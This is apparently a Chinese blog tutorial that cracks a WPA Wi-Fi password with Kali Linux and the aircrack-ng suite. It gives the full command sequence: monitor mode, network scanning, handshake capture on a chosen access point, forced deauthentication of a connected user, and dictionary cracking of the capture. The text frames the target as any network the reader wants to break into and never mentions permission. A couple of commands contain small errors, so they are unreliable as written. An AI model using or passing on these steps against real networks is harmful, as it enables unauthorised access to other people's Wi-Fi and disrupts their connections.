首先电脑插入USB无线网卡
wuxianwangka.jpg然后通过VMware里面 虚拟机 > 可移动设备 选择我们的无线网卡连接,如下图:
0.pngstep1: 查看网卡有没有加载进来
root@kali:~# iwconfig
注:iwconfig是查看无线网卡,ifconfig 是查看有线网卡
1.pngstep2: 开启无线网卡的侦听功能
root@kali:~# airmon-ng start wlan0
2.png
此时需要再次查看下网卡:
图片.pngstep3:侦听附近的wifi信号
root@kali:~# airodump-ng wlan0mon
33.png
3.png
如果出现无法侦听数据,重启一下服务,命令如下:
root@kali:~# airmon-ng check kill
step4: 选择你要破解的无线网络(ssid),抓取握手包
root@kali:~# airodump -c 1 --bssid B0:E1:7E:7D:EA:CC -w secevery wlan0mon
4-1.png
4-2.png
此时如果有人连接这个wifi,就会产生握手包,我们就会抓到这个握手包,但是运气并不是那么好,如上图所示一直没有抓到握手包,因此我们就要手动的踢掉一个人的wifi,这样它就会再次自动连接wifi,产生一个握手吧,这样我们就抓到了握手包。具体来看下一步:
step5:抓不到握手报文,需要模拟station,进行攻击
# aireplay-ng -0 10 -a bssid -c station mac wlan0mon
# aireplay-ng -0 10 -a AP的mac地址 -c 你要踢掉的主机的mac地址 wlan0mon
root@kali:~# aireplay-ng -0 10 -a B0:E1:7E:7D:EA:CC -c B0:E1:7E:7D:EA:CC wlan0mon
5.png
此时我们再去看刚才侦听握手包的窗口,发现已经抓到了握手包,如下图所示
55.png然后查看一下当前目录下抓到的握手包secevery-01.cap
555.pngstep6:破解报文,获得密码。 使用字典passwd.txt
root@kali:~# aircrack-ng -a2 -b B0:E1:7E:7D:EA:CC -w passwd.txt secevery-01.cap
6.png
网友评论